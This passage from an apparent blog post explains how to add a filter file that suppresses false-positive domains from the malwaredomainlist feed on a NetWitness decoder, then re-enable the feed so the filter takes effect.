2) Create a filter file and add the errant value(s) to it.


To pick one as an example the malwaredomainlist-domain.feed is generating meta that the domain is malicious. In the feed file named malwaredomainlist-domain.filter add the domain on a single line. If additional values generated by this feed are incorrect can add subsequent rows of those domains as well to the same file.


3) Deploy the filter file in the same directory on the decoder(s) that the feed has been applied.


To get the filter file in the appropriate location on the decoder (e.g. /etc/netwitness/ng/feeds) either secure copy the file to the system or use the feed upload option on the feed tab located on the decoder configuration page.



Unfortunately that page does not allow you to view the filter files loaded once they have been uploaded. You can however view the feed filter in the file tab located on the decoder configuration page.





4) Disable and enable the feed so decoder realizes filter file exists.


5) That is it. Enjoy!


Please let me know if there are any additional questions or improvement suggestions in this area.

Filter Blog

By date: By tag: